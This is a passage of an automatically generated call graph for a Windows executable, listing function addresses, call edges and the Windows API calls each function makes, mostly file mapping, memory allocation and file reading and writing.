401ca7 CreateFileMappingW 5602->5603 5604 401caf CreateFileMappingA 5602->5604 5605 401cb4 5603->5605 5604->5605 5606 401cf2 5605->5606 5607 401cb8 MapViewOfFile 5605->5607 5609 4011c1 4 API calls 5606->5609 5607->5606 5608 401ccf GetFileSize 5607->5608 5608->5606 5610 401ce6 5608->5610 5611 401cfc 5609->5611 5610->5508 5611->5508 5613 403dd8 6 API calls 5612->5613 5614 402a9c 5613->5614 5614->5484 5615 403e55 5614->5615 5616 403dd8 6 API calls 5615->5616 5617 402aa3 5616->5617 5617->5484 5618 408012 GetEnvironmentVariableA 5617->5618 5619 408036 5618->5619 5619->5531 5621 4081d8 5620->5621 5626 402aaf 5620->5626 5622 4081e1 5621->5622 5623 40820f 5621->5623 5625 4011c1 4 API calls 5622->5625 5622->5626 5997 408148 5623->5997 5625->5626 5626->5484 5627 40125c 5626->5627 5628 40129e 5627->5628 5629 401268 5627->5629 5631 40860b 5628->5631 5629->5628 5630 4010b0 4 API calls 5629->5630 5630->5628 5632 408581 22 API calls 5631->5632 5633 40861b 5632->5633 5634 408581 22 API calls 5633->5634 5635 402abb 5634->5635 5636 407f29 GetUserDefaultLangID VirtualAlloc 5635->5636 5637 407f4b 5636->5637 5639 407f56 5636->5639 5638 403f33 VirtualAlloc 5637->5638 5640 407f55 5638->5640 5644 407f89 5639->5644 5646 407f8e 5639->5646 6004 407cfe 5639->6004 5640->5539 5642 403f33 VirtualAlloc 5643 407fa3 VirtualFree VirtualFree 5642->5643 5643->5539 6059 407efd 5644->6059 5646->5642 5646->5643 5648 401462 6 API calls 5647->5648 5649 401da0 5648->5649 5650 401462 6 API calls 5649->5650 5651 401daa 5650->5651 5653 401d67 5 API calls 5651->5653 5654 401dd0 5651->5654 5652 401dfc 5652->5542 5653->5651 5654->5652 5655 40113f 4 API calls 5654->5655 5655->5652 5657 401545 5656->5657 5658 401592 5657->5658 5659 401bdb WideCharToMultiByte 5657->5659 5660 4015b6 CreateFileA 5658->5660 5661 4015ae CreateFileW 5658->5661 5659->5658 5662 4015bb 5660->5662 5661->5662 5663 4015c0 5662->5663 5664 4015c2 SetFilePointer 5662->5664 5663->5547 5665 401613 CloseHandle 5664->5665 5666 4015dd WriteFile 5664->5666 5665->5547 5666->5665 5667 4015f5 SetEndOfFile CloseHandle 5666->5667 6813 4011ec 5667->6813 5671 401148 5670->5671 5672 4011ba 5670->5672 5673 401156 5671->5673 5674 40125c 4 API calls 5671->5674 5672->5484 5675 4010b0 4 API calls 5673->5675 5676 401182 5673->5676 5674->5673 5675->5676 5677 4010b0 4 API calls 5676->5677 5677->5672 5679 401d10 VirtualAlloc 5678->5679 5680 401d54 5678->5680 5681 401d60 5679->5681 5682 401d2a ReadFile 5679->5682 5683 4011c1 4 API calls 5680->5683 5686 40113f 4 API calls 5681->5686 5682->5680 5684 401d53 5682->5684 5685 401d5e 5683->5685 5684->5516 5685->5516 5686->5685 5688 4024c8 5687->5688 5690 40246e 5687->5690 5689 40113f 4 API calls 5688->5689 5691 4024d9 5689->5691 5690->5688 5692 4024dc VirtualAlloc VirtualAlloc GetSystemTimeAsFileTime 5690->5692 5691->5484 5695 40258c 5692->5695 5707 40261a 5695->5707 6817 4021b7 5695->6817 5698 402759 6829 40161b 5698->6829 5700 40284f 5701 40286f VirtualFree VirtualFree 5700->5701 5703 40113f 4 API calls 5700->5703 5701->5484 5702 40285d 6840 4020e5 5702->6840 5704 40285b 5703->5704 5704->5701 5706 4026e0 5706->5698 5706->5702 5709 402695 5707->5709 6821 402298 5707->6821 5708 402865 5710 40113f 4 API calls 5708->5710 5709->5706 6825 4022be 5709->6825 5710->5701 5712 403e02 5711->5712 5713 403deb VirtualAlloc 5711->5713 5714 40113f 4 API calls 5712->5714 5713->5712 5715 403e01 5713->5715 5716 403e0c 5714->5716 5715->5561 5716->5561 5718 403e82 VirtualFree VirtualFree 5717->5718 5719 402b48 5717->5719 5718->5719 5719->5565 5721 40292a 5720->5721 5722 40291a UnmapViewOfFile 5720->5722 5723 402942 5721->5723 5724 402932 CloseHandle 5721->5724 5722->5721 5725 40295a 5723->5725 5726 40294a CloseHandle 5723->5726 5724->5723 5725->5509 5726->5725 5730 4080e6 5727->5730 5728 408147 5728->5582 5729 4080b1 VirtualAlloc 5729->5730 5730->5728 5730->5729 5732 401852 5731->5732 5738 40181e 5731->5738 5734 401898 5732->5734 5737 4018c7 5732->5737 5732->5738 5733 4018c5 5733->5582 5734->5733 5750 4017a9 5734->5750 5736 4018c4 5736->5582 5737->5738 5739 40113f 4 API calls 5737->5739 5738->5582 5740 401962 5739->5740 5740->5582 5747 40178a 5741->5747 5748 40171f 5741->5748 5743 40177b 5768 403f33 5743->5768 5745 401780 5772 401462 5745->5772 5747->5582 5748->5743 5748->5747 5755 408581 5748->5755 5763 403c0b 5748->5763 5754 4017b4 5750->5754 5751 40113f 4 API calls 5752 401815 5751->5752 5752->5736 5753 4017e3 5753->5736 5754->5751 5754->5753 5778 404448 5755->5778 5757 408586 5758 4085a6 5757->5758 5759 4085bb 5757->5759 5762 4085b7 5757->5762 5761 403f33 VirtualAlloc 5758->5761 5759->5762 5782 403ee2 VirtualAlloc 5759->5782 5761->5762 5762->5748 5764 403c1b 5763->5764 5766 403c14 5763->5766 5764->5748 5765 403b47 22 API calls 5765->5766 5766->5763 5766->5764 5766->5765 5767 404448 22 API calls 5766->5767 5767->5766 5769 403f3b 5768->5769 5771 403f43 5768->5771 5770 403ee2 VirtualAlloc 5769->5770 5769->5771 5770->5771 5771->5745 5776 40147c 5772->5776 5773 40153b 5773->5747 5774 4014de 5774->5773 5966 4010b0 5774->5966 5776->5774 5953 4013c5 5776->5953 5780 40444a 5778->5780 5779 4044bb 5779->5757 5780->5779 5784 404a85 5780->5784 5783 403f01 5782->5783 5783->5762 5785 404a8a 5784->5785 5786 404b1f 5785->5786 5791 404ab1 5785->5791 5792 404ac5 5785->5792 5787 404b5d 5786->5787 5790 404b23 5786->5790 5788 404b91 5787->5788 5795 404b61 5787->5795 5789 404bd8 5788->5789 5788->5792 5802 404bb6 5788->5802 5789->5792 5808 4048f9 22 API calls 5789->5808 5790->5792 5790->5802 5804 404b44 5790->5804 5791->5792 5793 404ac0 5791->5793 5794 404af2 5791->5794 5792->5780 5810 403288 5793->5810 5796 404b01 5794->5796 5797 404af6 5794->5797 5795->5792 5795->5802 5807 404b7a 5795->5807 5799 408581 22 API calls 5796->5799 5818 404926 5797->5818 5801 404b06 5799->5801 5801->5780 5802->5792 5829 4048f9 5802->5829 5803 404afb 5803->5780 5821 404a56 5804->5821 5809 404a56 22 API calls 5807->5809 5808->5792 5809->5792 5811 404448 22 API calls 5810->5811 5812 40328d 5811->5812 5813 403ee2 VirtualAlloc 5812->5813 5814 4032b6 5812->5814 5815 4032b4 5812->5815 5813->5815 5814->5792 5815->5814 5832 4031b7 5815->5832 5819 404448 22 API calls 5818->5819 5820 404932 5819->5820 5820->5803 5822 404448 22 API calls 5821->5822 5823 404a62 5822->5823 5824 404a7c 5823->5824 5825 404a6f 5823->5825 5828 404a74 5823->5828 5906 404978 5824->5906 5826 403c0b 22 API calls 5825->5826 5826->5828 5828->5792 5830 404448 22 API calls 5829->5830 5831 404905 5830->5831 5831->5792 5845 406881 5832->5845 5835 403248 5836 403251 CloseHandle 5835->5836 5842 403244 5835->5842 5836->5842 5837 4031f1 CreateFileMappingW 5839 4031fe 5837->5839 5838 4031f9 CreateFileMappingA 5838->5839 5839->5835 5840 403207 MapViewOfFile 5839->5840 5855 408246 5840->5855 5843 403f33 VirtualAlloc 5842->5843 5844 403246 5842->5844 5843->5844 5844->5792 5846 406898 5845->5846 5859 40682e 5846->5859 5848 4068ef GetFileSize 5849 4031d6 5848->5849 5849->5835 5849->5837 5849->5838 5853 40682e 3 API calls 5854 4068e3 5853->5854 5854->5848 5854->5849 5856 408255 5855->5856 5858 40825e 5855->5858 5856->5858 5894 408187 5856->5894 5858->5842 5871 4067b7 5859->5871 5863 406856 5864 406876 5863->5864 5865 40680d 3 API calls 5863->5865 5864->5848 5864->5849 5866 40675b 5864->5866 5865->5863 5883 4036a6 5866->5883 5868 406785 5870 40679b 5868->5870 5888 403ab8 5868->5888 5870->5849 5870->5853 5872 4067c2 5871->5872 5873 401bdb WideCharToMultiByte 5872->5873 5874 4067de 5872->5874 5873->5874 5875 4067f7 CreateFileW 5874->5875 5876 4067ff CreateFileA 5874->5876 5877 406804 5875->5877 5876->5877 5877->5863 5877->5864 5878 40680d 5877->5878 5879 406813 5878->5879 5880 40682b 5879->5880 5881 4067b7 WideCharToMultiByte CreateFileW CreateFileA 5879->5881 5880->5863 5882 40682a 5881->5882 5882->5863 5884 4036ae 5883->5884 5885 4036b5 5883->5885 5884->5868 5886 402e22 VirtualAlloc 5885->5886 5887 4036c0 5885->5887 5886->5885 5887->5868 5892 403ab9 5888->5892 5889 403b03 5890 403b1c 5889->5890 5891 403999 22 API calls 5889->5891 5890->5870 5891->5889 5892->5889 5892->5890 5893 403999 22 API calls 5892->5893 5893->5892 5895 403dd8 6 API calls 5894->5895 5897 408192 5895->5897 5896 4081bc 5896->5858 5897->5896 5898 4080e4 VirtualAlloc 5897->5898 5899 4081b0 5898->5899 5901 401d67 5899->5901 5902 401d7d UnmapViewOfFile CloseHandle CloseHandle 5901->5902 5903 401d6d 5901->5903 5902->5896 5904 403e80 VirtualFree VirtualFree 5903->5904 5905 401d75 5904->5905 5905->5896 5913 403b47 5906->5913 5908 40497d 5909 40497f 5908->5909 5910 404448 22 API calls 5908->5910 5909->5828 5911 4049a7 5910->5911 5911->5909 5922 404636 5911->5922 5915 403b4c 5913->5915 5914 403b4e 5914->5908 5915->5914 5921 403b59 5915->5921 5929 403430 5915->5929 5916 4036a6 VirtualAlloc 5917 403bac 5916->5917 5918 403bc2 5917->5918 5920 403ab8 22 API calls 5917->5920 5918->5908 5920->5918 5921->5916 5921->5918 5924 404637 5922->5924 5923 404448 22 API calls 5923->5924 5924->5923 5925 404649 5924->5925 5927 403b47 22 API calls 5924->5927 5928 40464e 5924->5928 5926 403c0b 22 API calls 5925->5926 5926->5928 5927->5924 5928->5909 5930 4034ac 5929->5930 5932 4034dc 5930->5932 5934 4034bc 5930->5934 5937 4033ba 5930->5937 5932->5921 5934->5932 5942 403008 5934->5942 5936 403f33 VirtualAlloc 5936->5932 5939 4033c6 5937->5939 5938 4031b7 22 API calls 5938->5939 5939->5938 5940 40333f 22 API calls 5939->5940 5941 40340e 5939->5941 5940->5939 5941->5934 5943 403033 5942->5943 5949 403066 5942->5949 5944 404448 22 API calls 5943->5944 5943->5949 5945 403057 5944->5945 5946 403070 5945->5946 5945->5949 5951 403064 5945->5951 5947 402fc4 22 API calls 5946->5947 5947->5949 5948 404448 22 API calls 5948->5951 5949->5932 5949->5936 5950 403c0b 22 API calls 5950->5951 5951->5948 5951->5949 5951->5950 5952 403430 22 API calls 5951->5952 5952->5951 5954 4013d4 5953->5954 5958 4013e5 5953->5958 5955 4013f9 IsBadReadPtr 5954->5955 5978 4012d3 5954->5978 5957 40140d 5955->5957 5959 401437 5957->5959 5983 4012a9 IsBadReadPtr 5957->5983 5958->5955 5961 401445 5959->5961 5962 40144c 5959->5962 5985 401365 5961->5985 5964 40144a 5962->5964 5989 401330 5962->5989 5964->5776 5967 401110 5966->5967 5968 4010bf 5966->5968 5970 40112e WriteFile 5967->5970 5977 401109 5967->5977 5969 4010dc WriteConsoleA 5968->5969 5973 4010e3 5968->5973 5972 401100 5969->5972 5971 401135 5970->5971 5971->5773 5972->5971 5975 401104 5972->5975 5974 4010f0 WriteConsoleW 5973->5974 5974->5972 5976 401057 WriteFile 5975->5976 5976->5977 5977->5967 5977->5970 5979 4012e9 5978->5979 5980 40130d 5979->5980 5981 4012a9 IsBadReadPtr 5979->5981 5980->5958 5982 40130c 5981->5982 5982->5958 5984 4012b9 5983->5984 5984->5959 5986 401370 5985->5986 5987 40138b 5986->5987 5988 4012d3 IsBadReadPtr 5986->5988 5987->5964 5988->5987 5990 40135c 5989->5990 5991 401335 5989->5991 5990->5964 5991->5990 5992 4012d3 IsBadReadPtr 5991->5992 5992->5990 5994 401bf0 5993->5994 5995 401c13 WideCharToMultiByte 5994->5995 5996 401c32 5994->5996 5995->5996 5996->5593 5998 403dd8 6 API calls 5997->5998 5999 408153 5998->5999 6000 40817b 5999->6000 6001 4080e4 VirtualAlloc 5999->6001 6000->5626 6002 408170 6001->6002 6003 402912 3 API calls 6002->6003 6003->6000 6005 404448 22 API calls 6004->6005 6008 407d49 6005->6008 6006 407da2 6088 404691 6006->6088 6008->6006 6009 407d98 6008->6009 6010 407d8a 6008->6010 6018 407d74 6008->6018 6009->6006 6013 407d9c 6009->6013 6065 404f1a 6010->6065 6011 404448 22 API calls 6022 407dbf 6011->6022 6079 406dcf 6013->6079 6016 407df0 6017 403c0b 22 API calls 6016->6017 6027 407df5 6017->6027 6018->5639 6019 407e9b 6024 407ead 6019->6024 6121 406be2 6019->6121 6021 407eb9 6021->5639 6022->6011 6022->6016 6022->6018 6023 407e77 6022->6023 6025 403b47 22 API calls 6022->6025 6022->6027 6035 407e4e 6022->6035 6023->6019 6026 407eba 6023->6026 6024->5639 6025->6022 6029 407ec4 6026->6029 6030 407ebe 6026->6030 6027->6018 6027->6023 6028 407e13 6027->6028 6096 407c5e 6028->6096 6033 407ec8 6029->6033 6034 407ece 6029->6034 6141 407a0a 6030->6141 6159 407b63 6033->6159 6039 407ed2 6034->6039 6040 407ed8 6034->6040 6035->6018 6043 407e71 6035->6043 6049 403f33 VirtualAlloc 6035->6049 6036 407e28 6036->5639 6037 407ec3 6037->5639 6184 406fff 6039->6184 6041 407ee2 6040->6041 6042 407edc 6040->6042 6047 407ee6 6041->6047 6048 407eec 6041->6048 6046 407c5e 28 API calls 6042->6046 6050 407c5e 28 API calls 6043->6050 6044 407ecd 6044->5639 6052 407ee1 6046->6052 6192 40747e 6047->6192 6054 407ef6 6048->6054 6207 40742f 6048->6207 6049->6043 6055 407e76 6050->6055 6051 407ed7 6051->5639 6052->5639 6054->5639 6055->5639 6056 407eeb 6056->5639 6058 407ef5 6058->5639 6060 407f06 6059->6060 6796 406607 6060->6796 6063 407f28 6063->5646 6064 403f33 VirtualAlloc 6064->6063 6066 404448 22 API calls 6065->6066 6073 404f1f 6066->6073 6067 404f2a 6068 403c0b 22 API calls 6067->6068 6069 404f2f 6068->6069 6077 404f3d 6069->6077 6212 4045a0 6069->6212 6071 403b47 22 API calls 6071->6073 6072 404448 22 API calls 6076 404f82 6072->6076 6073->6065 6073->6067 6073->6069 6073->6071 6073->6077 6074 404f94 6075 403c0b 22 API calls 6074->6075 6075->6077 6076->6072 6076->6074 6076->6077 6078 403b47 22 API calls 6076->6078 6077->6018 6078->6076 6216 406da2 6079->6216 6081 404448 22 API calls 6084 406dde 6081->6084 6082 404691 22 API calls 6082->6084 6083 4045a0 22 API calls 6083->6084 6084->6081 6084->6082 6084->6083 6086 403b47 22 API calls 6084->6086 6087 406df9 6084->6087 6223 402e90 6084->6223 6086->6084 6087->5639 6093 4046b2 6088->6093 6089 4046f5 6089->6022 6090 404448 22 API calls 6090->6093 6091 403c0b 22 API calls 6091->6093 6092 404740 6092->6089 6094 403f33 VirtualAlloc 6092->6094 6093->6089 6093->6090 6093->6091 6093->6092 6095 403b47 22 API calls 6093->6095 6094->6089 6095->6093 6097 404448 22 API calls 6096->6097 6100 407c63 6097->6100 6098 407cd7 6098->6036 6099 407c98 6101 407cd2 6099->6101 6103 406881 22 API calls 6099->6103 6100->6096 6100->6098 6100->6099 6106 407c75 6100->6106 6102 4066d0 CloseHandle 6101->6102 6102->6098 6104 407ca4 6103->6104 6104->6101 6398 404eaa 6104->6398 6105 407c95 6107 404eaa 2 API calls 6105->6107 6117 407c97 6105->6117 6106->6099 6106->6105 6110 407c89 6106->6110 6118 407ce3 6107->6118 6109 407cb3 6109->6101 6403 40693d ReadFile 6109->6403 6112 406d67 24 API calls 6110->6112 6111 407cf8 6111->6036 6112->6105 6116 407cc1 6405 4066d0 6116->6405 6117->6036 6118->6111 6409 406c70 6118->6409 6120 407ccc 6120->6036 6122 404448 22 API calls 6121->6122 6126 406be7 6122->6126 6123 406be9 6124 4066d4 2 API calls 6123->6124 6125 406c6e 6124->6125 6125->6021 6126->6121 6126->6123 6127 406bfd 6126->6127 6127->6123 6128 406881 22 API calls 6127->6128 6129 406c09 6128->6129 6129->6123 6441 40691a VirtualAlloc 6129->6441 6131 406c10 6131->6123 6132 40693d ReadFile 6131->6132 6133 406c1c 6132->6133 6133->6123 6134 404e50 VirtualAlloc 6133->6134 6136 406c2b 6134->6136 6135 406c59 6135->6123 6138 406c5d 6135->6138 6136->6123 6136->6135 6442 406a8e 6136->6442 6453 4066d4 6138->6453 6142 407a68 6141->6142 6148 407a1f 6141->6148 6143 406da2 24 API calls 6142->6143 6145 407a64 6143->6145 6144 404448 22 API calls 6144->6148 6146 404eaa 2 API calls 6145->6146 6157 407a66 6145->6157 6155 407a79 6146->6155 6147 407a50 6150 4045a0 22 API calls 6147->6150 6148->6144 6148->6147 6149 407a47 6148->6149 6148->6157 6458 405892 6149->6458 6150->6149 6151 404448 22 API calls 6151->6155 6153 407a5f 6154 406d67 24 API calls 6153->6154 6154->6145 6155->6151 6155->6157 6465 40799f 6155->6465 6472 40798a 6155->6472 6157->6037 6160 407b68 6159->6160 6161 404448 22 API calls 6160->6161 6162 407b81 6160->6162 6179 407b61 6160->6179 6161->6160 6555 404dc6 6162->6555 6165 407bbb 6167 406d67 24 API calls 6165->6167 6165->6179 6166 4045a0 22 API calls 6168 407ba5 6166->6168 6169 407bc2 6167->6169 6168->6165 6170 405892 22 API calls 6168->6170 6171 404eaa 2 API calls 6169->6171 6169->6179 6172 407bb4 6170->6172 6173 407bce 6171->6173 6175 4058fd 22 API calls 6172->6175 6172->6179 6173->6179 6560 406320 6173->6560 6175->6165 6176 404448 22 API calls 6178 407bd5 6176->6178 6178->6176 6178->6179 6564 407b22 6178->6564 6570 405a99 6178->6570 6596 405b85 6178->6596 6630 405c93 6178->6630 6655 405d56 6178->6655 6179->6044 6185 406da2 24 API calls 6184->6185 6186 407004 6185->6186 6187 404eaa 2 API calls 6186->6187 6191 40703f 6186->6191 6190 407010 6187->6190 6188 404e50 VirtualAlloc 6188->6190 6190->6188 6190->6191 6704 406ec5 6190->6704 6191->6051 6193 404eaa 2 API calls 6192->6193 6194 407488 6193->6194 6195 40529d 2 API calls 6194->6195 6200 407500 6194->6200 6196 4074ab 6195->6196 6197 404448 22 API calls 6196->6197 6196->6200 6201 4058fd 22 API calls 6196->6201 6202 407507 6196->6202 6718 4071c9 6196->6718 6197->6196 6198 404448 22 API calls 6198->6202 6200->6056 6201->6196 6202->6198 6204 407590 6202->6204 6205 404ed3 VirtualAlloc 6202->6205 6742 40733e 6202->6742 6760 4072f1 6202->6760 6204->6056 6205->6202 6208 404448 22 API calls 6207->6208 6209 407434 6208->6209 6210 404eaa 2 API calls 6209->6210 6211 407455 6209->6211 6210->6211 6211->6058 6213 4045a9 6212->6213 6215 4045b6 6212->6215 6213->6076 6214 404448 22 API calls 6214->6215 6215->6213 6215->6214 6217 404448 22 API calls 6216->6217 6219 406da7 6217->6219 6218 406dcd 6218->6084 6219->6216 6219->6218 6220 406dc0 6219->6220 6229 406d67 6220->6229 6222 406dcc 6222->6084 6224 402ea6 6223->6224 6228 402e98 6223->6228 6395 402e50 6224->6395 6227 402e50 VirtualAlloc 6227->6228 6228->6084 6230 404448 22 API calls 6229->6230 6231 406d6c 6230->6231 6231->6229 6233 406d92 6231->6233 6234 406436 6231->6234 6233->6222 6235 406458 6234->6235 6236 40643a 6234->6236 6237 406476 6235->6237 6238 40645c 6235->6238 6239 404636 22 API calls 6236->6239 6241 406491 6237->6241 6242 40647a 6237->6242 6240 404f1a 22 API calls 6238->6240 6243 406444 6239->6243 6244 406461 6240->6244 6247 4064c3 6241->6247 6248 406495 6241->6248 6245 404636 22 API calls 6242->6245 6246 406457 6243->6246 6284 4058fd 6243->6284 6250 406475 6244->6250 6256 4058fd 22 API calls 6244->6256 6253 406484 6245->6253 6246->6231 6251 4064c7 6247->6251 6252 4064dc 6247->6252 6288 4053ed 6248->6288 6250->6231 6293 40579e 6251->6293 6259 4064e0 6252->6259 6260 4064ff 6252->6260 6258 406490 6253->6258 6265 4058fd 22 API calls 6253->6265 6256->6250 6258->6231 6299 405449 6259->6299 6262 406512 6260->6262 6263 406503 6260->6263 6261 4064c2 6261->6231 6268 406535 6262->6268 6269 406516 6262->6269 6309 406216 6263->6309 6265->6258 6271 406552 6268->6271 6277 40579e 22 API calls 6268->6277 6332 4059a3 6269->6332 6270 4064f7 6275 4064fe 6270->6275 6276 4058fd 22 API calls 6270->6276 6271->6231 6272 4058fd 22 API calls 6272->6261 6273 406508 6278 406511 6273->6278 6282 4058fd 22 API calls 6273->6282 6275->6231 6276->6275 6280 406546 6277->6280 6278->6231 6279 40652d 6281 406534 6279->6281 6283 4058fd 22 API calls 6279->6283 6280->6231 6281->6231 6282->6278 6283->6281 6285 405921 6284->6285 6286 405906 6284->6286 6285->6246 6286->6285 6287 404448 22 API calls 6286->6287 6287->6285 6347 405396 6288->6347 6290 4053f8 6292 4053ff 6290->6292 6352 40529d 6290->6352 6292->6261 6292->6272 6296 4057b1 6293->6296 6294 404448 22 API calls 6294->6296 6295 403c0b 22 API calls 6295->6296 6296->6294 6296->6295 6297 403b47 22 API calls 6296->6297 6298 40581a 6296->6298 6297->6296 6298->6231 6300 404448 22 API calls 6299->6300 6301 405454 6300->6301 6302 405461 6301->6302 6303 405477 6301->6303 6308 405473 6301->6308 6371 405401 6302->6371 6305 403b47 22 API calls 6303->6305 6306 40547c 6305->6306 6307 40529d 2 API calls 6306->6307 6306->6308 6307->6308 6308->6270 6374 4054a8 6309->6374 6311 406226 6312 406214 6311->6312 6313 4045a0 22 API calls 6311->6313 6312->6273 6314 406234 6313->6314 6314->6312 6315 4053ed 23 API calls 6314->6315 6316 406257 6315->6316 6316->6312 6317 4045a0 22 API calls 6316->6317 6331 4062a2 6316->6331 6319 40627d 6317->6319 6318 4045a0 22 API calls 6321 4062ed 6318->6321 6320 4062b5 6319->6320 6381 406105 6319->6381 6320->6273 6321->6320 6388 40618d 6321->6388 6324 406284 6324->6320 6326 4045a0 22 API calls 6324->6326 6325 4062f4 6325->6273 6327 40628b 6326->6327 6327->6320 6328 404448 22 API calls 6327->6328 6329 406292 6328->6329 6329->6320 6330 403c0b 22 API calls 6329->6330 6329->6331 6330->6331 6331->6318 6331->6320 6335 4059a9 6332->6335 6333 404448 22 API calls 6333->6335 6334 4059c0 6336 403c0b 22 API calls 6334->6336 6335->6333 6335->6334 6337 4059e6 6335->6337 6338 405a0c 6335->6338 6339 403b47 22 API calls 6335->6339 6341 4059c5 6335->6341 6336->6341 6337->6338 6337->6341 6343 405a4a 6337->6343 6340 405a39 lstrlen 6338->6340 6338->6341 6339->6335 6342 40529d 2 API calls 6340->6342 6341->6279 6342->6341 6344 405a5b 6343->6344 6345 403f33 VirtualAlloc 6343->6345 6346 40529d 2 API calls 6344->6346 6345->6344 6346->6341 6348 404448 22 API calls 6347->6348 6350 40539b 6348->6350 6349 4053bd 6349->6290 6350->6347 6350->6349 6351 403b47 22 API calls 6350->6351 6351->6350 6355 4051f8 6352->6355 6354 4052ab 6354->6292 6356 405201 6355->6356 6357 40520a 6356->6357 6358 40525a 6356->6358 6359 40521c 6356->6359 6357->6354 6361 403ee2 VirtualAlloc 6358->6361 6367 405267 6358->6367 6360 403ee2 VirtualAlloc 6359->6360 6362 405229 6359->6362 6360->6362 6361->6367 6362->6354 6363 405291 6363->6354 6364 40528c 6366 4051a9 MultiByteToWideChar 6364->6366 6366->6363 6367->6363 6367->6364 6368 4051a9 6367->6368 6369 4051b1 MultiByteToWideChar 6368->6369 6370 4051cb 6368->6370 6369->6370 6370->6367 6372 403c0b 22 API calls 6371->6372 6373 40540c 6372->6373 6373->6308 6376 4054b3 6374->6376 6375 404448 22 API calls 6375->6376 6376->6375 6377 4054db 6376->6377 6378 403b47 22 API calls 6376->6378 6380 4054ca 6376->6380 6379 403c0b 22 API calls 6377->6379 6378->6376 6379->6380 6380->6311 6382 404448 22 API calls 6381->6382 6387 40610a 6382->6387 6383 406177 6384 403c0b 22 API calls 6383->6384 6385 406142 6384->6385 6385->6324 6386 403b47 22 API calls 6386->6387 6387->6381 6387->6383 6387->6385 6387->6386 6389 404448 22 API calls 6388->6389 6392 406192 6389->6392 6390 4061ff 6391 403c0b 22 API calls 6390->6391 6394 4061d3 6391->6394 6392->6388 6392->6390 6393 403b47 22 API calls 6392->6393 6392->6394 6393->6392 6394->6325 6396 402e62 VirtualAlloc 6395->6396 6397 402e7f 6395->6397 6396->6397 6397->6227 6397->6228 6427 404e50 6398->6427 6402 404ebe 6402->6109 6404 40695a 6403->6404 6404->6101 6404->6116 6406 4066eb 6405->6406 6407 4066f3 CloseHandle 6406->6407 6408 4066f9 6406->6408 6407->6408 6408->6120 6413 406c78 6409->6413 6410 404448 22 API calls 6410->6413 6411 404e50 VirtualAlloc 6414 406d35 6411->6414 6412 406c92 6415 404e50 VirtualAlloc 6412->6415 6413->6410 6413->6412 6417 406cf9 6413->6417 6420 403b47 22 API calls 6413->6420 6426 406d0a 6413->6426 6414->6417 6418 4051f8 2 API calls 6414->6418 6416 406c9c 6415->6416 6416->6417 6419 406cc8 6416->6419 6421 406cac 6416->6421 6417->6118 6425 406cb1 6418->6425 6422 403c0b 22 API calls 6419->6422 6420->6413 6423 403c0b 22 API calls 6421->6423 6422->6425 6423->6425 6424 4045a0 22 API calls 6424->6417 6425->6417 6425->6424 6426->6411 6426->6417 6426->6425 6430 404e55 6427->6430 6428 404e64 VirtualAlloc 6429 404e8b 6428->6429 6428->6430 6429->6402 6431 4069a3 6429->6431 6430->6428 6430->6429 6432 4069a8 6431->6432 6434 4069cc 6432->6434 6437 40697c 6432->6437 6435 40697c CharUpperW 6434->6435 6436 406a05 6434->6436 6435->6436 6436->6402 6438 406985 6437->6438 6440 406993 6437->6440 6439 40698b CharUpperW 6438->6439 6439->6440 6440->6434 6441->6131 6443 406a9e 6442->6443 6447 406ab9 6442->6447 6444 406a62 6443->6444 6443->6447 6445 406ab2 6444->6445 6446 4069a3 CharUpperW 6444->6446 6445->6135 6448 406a80 6446->6448 6447->6445 6449 4069a3 CharUpperW 6447->6449 6450 406b60 6447->6450 6448->6135 6449->6447 6451 4069a3 CharUpperW 6450->6451 6452 406b73 6451->6452 6452->6135 6454 4066eb 6453->6454 6455 4066de VirtualFree 6453->6455 6456 4066f3 CloseHandle 6454->6456 6457 4066f9 6454->6457 6455->6454 6456->6457 6457->6021 6462 4058a2 6458->6462 6459 404448 22 API calls 6459->6462 6460 4058d6 6461 403c0b 22 API calls 6460->6461 6463 4058c9 6461->6463 6462->6459 6462->6460 6462->6463 6464 403b47 22 API calls 6462->6464 6463->6153 6464->6462 6466 4079b4 6465->6466 6467 4079ae 6465->6467 6493 40789e 6466->6493 6479 407744 6467->6479 6470 4079b9 6470->6155 6471 4079b3 6471->6155 6473 407993 6472->6473 6474 407999 6472->6474 6531 4077d6 6473->6531 6546 40792a 6474->6546 6477 407998 6477->6155 6478 40799e 6478->6155 6507 404ed3 6479->6507 6481 407749 6484 407754 6481->6484 6510 4076ed 6481->6510 6483 407750 6483->6484 6513 405523 6483->6513 6484->6471 6487 4045a0 22 API calls 6488 40778b 6487->6488 6489 404691 22 API calls 6488->6489 6490 4077a8 6489->6490 6491 4077ba 6490->6491 6517 40764b 6490->6517 6491->6471 6494 404ed3 VirtualAlloc 6493->6494 6495 4078aa 6494->6495 6496 4078b5 6495->6496 6497 4076ed 22 API calls 6495->6497 6496->6470 6498 4078b1 6497->6498 6498->6496 6499 405523 23 API calls 6498->6499 6500 4078df 6499->6500 6500->6496 6501 4045a0 22 API calls 6500->6501 6502 4078e6 6501->6502 6503 404691 22 API calls 6502->6503 6504 4078fc 6503->6504 6504->6496 6505 40764b 22 API calls 6504->6505 6506 40790f 6505->6506 6506->6470 6508 404e50 VirtualAlloc 6507->6508 6509 404ee7 6508->6509 6509->6481 6511 404448 22 API calls 6510->6511 6512 4076f2 6511->6512 6512->6483 6514 40552c 6513->6514 6516 405531 6513->6516 6515 4053ed 23 API calls 6514->6515 6515->6516 6516->6484 6516->6487 6518 4045a0 22 API calls 6517->6518 6519 40766b 6518->6519 6526 40419f 6519->6526 6521 407692 6521->6491 6522 404448 22 API calls 6524 407670 6522->6524 6523 40419f 22 API calls 6523->6524 6524->6521 6524->6522 6524->6523 6525 403c0b 22 API calls 6524->6525 6525->6524 6528 4041a6 6526->6528 6527 4041b9 6527->6524 6528->6527 6529 404448 22 API calls 6528->6529 6530 4041b8 6529->6530 6530->6524 6532 404ed3 VirtualAlloc 6531->6532 6533 4077db 6532->6533 6534 405523 23 API calls 6533->6534 6545 407848 6533->6545 6535 4077f9 6534->6535 6536 4045a0 22 API calls 6535->6536 6535->6545 6537 407804 6536->6537 6538 404691 22 API calls 6537->6538 6539 407821 6538->6539 6540 40764b 22 API calls 6539->6540 6539->6545 6541 407833 6540->6541 6542 405892 22 API calls 6541->6542 6541->6545 6543 407841 6542->6543 6544 404448 22 API calls 6543->6544 6543->6545 6544->6545 6545->6477 6547 404ed3 VirtualAlloc 6546->6547 6548 407936 6547->6548 6549 405523 23 API calls 6548->6549 6554 40795c 6548->6554 6550 407950 6549->6550 6551 4045a0 22 API calls 6550->6551 6550->6554 6552 407957 6551->6552 6553 40764b 22 API calls 6552->6553 6553->6554 6554->6478 6556 404ddb 6555->6556 6558 404e0c 6556->6558 6559 